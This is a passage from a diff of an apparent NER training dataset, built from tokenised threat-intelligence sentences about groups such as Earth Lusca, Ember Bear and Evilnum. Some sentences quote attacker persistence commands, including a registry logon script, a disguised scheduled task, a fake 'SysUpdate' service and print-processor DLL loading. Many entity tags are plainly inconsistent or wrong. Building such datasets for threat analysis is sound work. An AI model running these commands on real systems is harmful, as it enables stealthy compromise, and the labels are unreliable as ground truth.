"I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "placed", + "a", + "malicious", + "payload", + "in", + "`%WINDIR%\\SYSTEM32\\oci.dll`", + "so", + "it", + "would", + "be", + "sideloaded", + "by", + "the", + "MSDTC", + "service." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "certutil", + "to", + "decode", + "a", + "string", + "into", + "a", + "cabinet", + "file." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "Nltest", + "to", + "obtain", + "information", + "about", + "domain", + "controllers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "registered", + "domains,", + "intended", + "to", + "look", + "like", + "legitimate", + "target", + "domains,", + "that", + "have", + "been", + "used", + "in", + "watering", + "hole", + "attacks." + ], + "ner_tags": [ + "I-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "performed", + "watering", + "hole", + "attacks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Org", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "the", + "megacmd", + "tool", + "to", + "upload", + "stolen", + "files", + "from", + "a", + "victim", + "network", + "to", + "MEGA." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "compromised", + "victims", + "by", + "directly", + "exploiting", + "vulnerabilities", + "of", + "public-facing", + "servers,", + "including", + "those", + "associated", + "with", + "Microsoft", + "Exchange", + "and", + "Oracle", + "GlassFish." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "Mimikatz", + "to", + "exploit", + "a", + "domain", + "controller", + "via", + "the", + "ZeroLogon", + "exploit", + "(CVE-2020-1472)." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "B-Features" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "manipulated", + "legitimate", + "websites", + "to", + "inject", + "malicious", + "JavaScript", + "code", + "as", + "part", + "of", + "their", + "watering", + "hole", + "operations." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "ProcDump", + "to", + "obtain", + "the", + "hashes", + "of", + "credentials", + "by", + "dumping", + "the", + "memory", + "of", + "the", + "LSASS", + "process." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "required", + "users", + "to", + "click", + "on", + "a", + "malicious", + "file", + "for", + "the", + "loader", + "to", + "activate." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "sent", + "spearphishing", + "emails", + "that", + "required", + "the", + "user", + "to", + "click", + "on", + "a", + "malicious", + "link", + "and", + "subsequently", + "open", + "a", + "decoy", + "document", + "with", + "a", + "malicious", + "loader." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "acquired", + "and", + "used", + "a", + "variety", + "of", + "malware,", + "including", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "used", + "the", + "command", + "`move", + "[file", + "path]", + "c:\\windows\\system32\\spool\\prtprocs\\x64\\spool.dll`", + "to", + "move", + "and", + "register", + "a", + "malicious", + "DLL", + "name", + "as", + "a", + "Windows", + "print", + "processor,", + "which", + "eventually", + "was", + "loaded", + "by", + "the", + "Print", + "Spooler", + "service." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "modified", + "the", + "registry", + "using", + "the", + "command", + "<code>reg", + "add", + "“HKEY_CURRENT_USER\\Environment”", + "/v", + "UserInitMprLogonScript", + "/t", + "REG_SZ", + "/d", + "“[file", + "path]”</code>", + "for", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "`mshta.exe`", + "to", + "load", + "an", + "HTA", + "script", + "within", + "a", + "malicious", + ".LNK", + "file." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "used", + "Base64", + "to", + "encode", + "strings." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "PowerShell", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "added", + "the", + "Registry", + "key", + "`HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows", + "x64\\Print", + "Processors\\UDPrint”", + "/v", + "Driver", + "/d", + "“spool.dll", + "/f`", + "to", + "load", + "malware", + "as", + "a", + "Print", + "Processor." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "Tasklist", + "to", + "obtain", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "adopted", + "Cloudflare", + "as", + "a", + "proxy", + "for", + "compromised", + "servers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "used", + "Python", + "scripts", + "for", + "port", + "scanning", + "or", + "building", + "reverse", + "shells." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "used", + "the", + "command", + "<code>powershell", + "“Get-EventLog", + "-LogName", + "security", + "-Newest", + "500", + "|", + "where", + "{$_.EventID", + "-eq", + "4624}", + "|", + "format-list", + "-", + "property", + "*", + "|", + "findstr", + "“Address””</code>", + "to", + "find", + "the", + "network", + "information", + "of", + "successfully", + "logged-in", + "accounts", + "to", + "discovery", + "addresses", + "of", + "other", + "machines.", + "Earth", + "Lusca", + "has", + "also", + "used", + "multiple", + "scanning", + "tools", + "to", + "discover", + "other", + "machines", + "within", + "the", + "same", + "compromised", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "dropped", + "an", + "SSH-authorized", + "key", + "in", + "the", + "`/root/.ssh`", + "folder", + "in", + "order", + "to", + "access", + "a", + "compromised", + "server", + "with", + "SSH." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "used", + "the", + "command", + "<code>schtasks", + "/Create", + "/SC", + "ONLOgon", + "/TN", + "WindowsUpdateCheck", + "/TR", + "“[file", + "path]”", + "/ru", + "system</code>", + "for", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "acquired", + "multiple", + "servers", + "for", + "some", + "of", + "their", + "operations,", + "using", + "each", + "server", + "for", + "a", + "different", + "role." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "compromised", + "web", + "servers", + "as", + "part", + "of", + "their", + "operational", + "infrastructure." + ], + "ner_tags": [ + "I-HackOrg", + "B-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "sent", + "spearphishing", + "emails", + "to", + "potential", + "targets", + "that", + "contained", + "a", + "malicious", + "link." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "steganography", + "to", + "hide", + "shellcode", + "in", + "a", + "BMP", + "image", + "file." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "used", + "the", + "command", + "<code>ipconfig</code>", + "to", + "obtain", + "information", + "about", + "network", + "configurations." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "employed", + "a", + "PowerShell", + "script", + "called", + "RDPConnectionParser", + "to", + "read", + "and", + "filter", + "the", + "Windows", + "event", + "log", + "“Microsoft-Windows-TerminalServices-RDPClient/Operational”", + "(Event", + "ID", + "1024)", + "to", + "obtain", + "network", + "information", + "from", + "RDP", + "connections.", + "Earth", + "Lusca", + "has", + "also", + "used", + "netstat", + "from", + "a", + "compromised", + "system", + "to", + "obtain", + "network", + "connection", + "information." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "collected", + "information", + "on", + "user", + "accounts", + "via", + "the", + "<code>whoami</code>", + "command." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "Tasklist", + "to", + "obtain", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "acquired", + "and", + "used", + "a", + "variety", + "of", + "open", + "source", + "tools." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "staged", + "malware", + "and", + "malicious", + "files", + "on", + "compromised", + "web", + "servers,", + "GitHub,", + "and", + "Google", + "Drive." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "used", + "VBA", + "scripts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "scanned", + "for", + "vulnerabilities", + "in", + "the", + "public-facing", + "servers", + "of", + "their", + "targets." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "established", + "GitHub", + "accounts", + "to", + "host", + "their", + "malware." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "compromised", + "Google", + "Drive", + "repositories." + ], + "ner_tags": [ + "I-HackOrg", + "B-Exp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "used", + "a", + "VBA", + "script", + "to", + "execute", + "WMI." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "created", + "a", + "service", + "using", + "the", + "command", + "<code>sc", + "create", + "“SysUpdate”", + "binpath=", + "“cmd", + "/c", + "start", + "“[file", + "path]””&&sc", + "config", + "“SysUpdate”", + "start=", + "auto&&net", + "start", + "SysUpdate</code>", + "for", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elderwood", + "has", + "delivered", + "zero-day", + "exploits", + "and", + "malware", + "to", + "victims", + "by", + "injecting", + "malicious", + "code", + "into", + "specific", + "public", + "Web", + "pages", + "visited", + "by", + "targets", + "within", + "a", + "particular", + "sector." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elderwood", + "has", + "encrypted", + "documents", + "and", + "malicious", + "executables." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elderwood", + "has", + "used", + "exploitation", + "of", + "endpoint", + "software,", + "including", + "Microsoft", + "Internet", + "Explorer", + "Adobe", + "Flash", + "vulnerabilities,", + "to", + "gain", + "execution.", + "They", + "have", + "also", + "used", + "zero-day", + "exploits." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Exp", + "I-Tool", + "I-Tool", + "I-Exp", + "I-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp" + ] + }, + { + "tokens": [ + "The", + "Ritsol", + "backdoor", + "trojan", + "used", + "by", + "Elderwood", + "can", + "download", + "files", + "onto", + "a", + "compromised", + "host", + "from", + "a", + "remote", + "location." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elderwood", + "has", + "leveraged", + "multiple", + "types", + "of", + "spearphishing", + "in", + "order", + "to", + "attempt", + "to", + "get", + "a", + "user", + "to", + "open", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elderwood", + "has", + "leveraged", + "multiple", + "types", + "of", + "spearphishing", + "in", + "order", + "to", + "attempt", + "to", + "get", + "a", + "user", + "to", + "open", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elderwood", + "has", + "packed", + "malware", + "payloads", + "before", + "delivery", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elderwood", + "has", + "delivered", + "zero-day", + "exploits", + "and", + "malware", + "to", + "victims", + "via", + "targeted", + "emails", + "containing", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elderwood", + "has", + "delivered", + "zero-day", + "exploits", + "and", + "malware", + "to", + "victims", + "via", + "targeted", + "emails", + "containing", + "a", + "link", + "to", + "malicious", + "content", + "hosted", + "on", + "an", + "uncommon", + "Web", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "added", + "extra", + "spaces", + "between", + "JavaScript", + "code", + "characters", + "to", + "increase", + "the", + "overall", + "file", + "size." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "used", + "stolen", + "certificates", + "from", + "Electrum", + "Technologies", + "GmbH", + "to", + "sign", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-OffAct", + "O", + "O", + "B-Org", + "B-SecTeam", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "stolen", + "legitimate", + "certificates", + "to", + "sign", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "obfuscated", + "malicious", + "scripts", + "to", + "help", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "used", + "control", + "panel", + "files", + "(CPL),", + "delivered", + "via", + "e-mail,", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "executed", + "a", + "batch", + "script", + "designed", + "to", + "disable", + "Windows", + "Defender", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "exploited", + "Microsoft", + "Office", + "vulnerability", + "CVE-2017-11882." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "used", + "tools", + "to", + "download", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "used", + "JavaScript", + "to", + "execute", + "malicious", + "code", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "attempted", + "to", + "lure", + "victims", + "into", + "executing", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "attempted", + "to", + "lure", + "users", + "to", + "click", + "on", + "a", + "malicious", + "link", + "within", + "a", + "spearphishing", + "email." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "used", + "an", + "open", + "source", + "batch", + "script", + "to", + "modify", + "Windows", + "Defender", + "registry", + "keys." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "obfuscated", + "malware", + "to", + "help", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "used", + "PowerShell", + "to", + "download", + "and", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "packed", + "malware", + "to", + "help", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "attachments", + "in", + "the", + "form", + "of", + "PDFs,", + "Word", + "documents,", + "JavaScript", + "files,", + "and", + "Control", + "Panel", + "File", + "(CPL)", + "executables." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "obtained", + "and", + "used", + "open", + "source", + "scripts", + "from", + "GitHub." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "has", + "used", + "Discord's", + "content", + "delivery", + "network", + "(CDN)", + "to", + "deliver", + "malware", + "and", + "malicious", + "scripts", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ember", + "Bear", + "had", + "used", + "`cmd.exe`", + "and", + "Windows", + "Script", + "Host", + "(wscript)", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Equation", + "is", + "known", + "to", + "have", + "the", + "capability", + "to", + "overwrite", + "the", + "firmware", + "on", + "hard", + "drives", + "from", + "some", + "manufacturers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Equation", + "has", + "been", + "observed", + "utilizing", + "environmental", + "keying", + "in", + "payload", + "delivery." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Equation", + "has", + "used", + "an", + "encrypted", + "virtual", + "file", + "system", + "stored", + "in", + "the", + "Windows", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Equation", + "has", + "used", + "tools", + "with", + "the", + "functionality", + "to", + "search", + "for", + "specific", + "information", + "about", + "the", + "attached", + "hard", + "drive", + "that", + "could", + "be", + "used", + "to", + "identify", + "and", + "overwrite", + "the", + "firmware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Evilnum", + "has", + "used", + "PowerShell", + "to", + "bypass", + "UAC." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "can", + "collect", + "email", + "credentials", + "from", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "has", + "used", + "the", + "malware", + "variant,", + "TerraTV,", + "to", + "load", + "a", + "malicious", + "DLL", + "placed", + "in", + "the", + "TeamViewer", + "directory,", + "instead", + "of", + "the", + "original", + "Windows", + "DLL", + "located", + "in", + "a", + "system", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "has", + "deleted", + "files", + "used", + "during", + "infection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "can", + "deploy", + "additional", + "components", + "or", + "tools", + "as", + "needed." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "has", + "used", + "malicious", + "JavaScript", + "files", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", 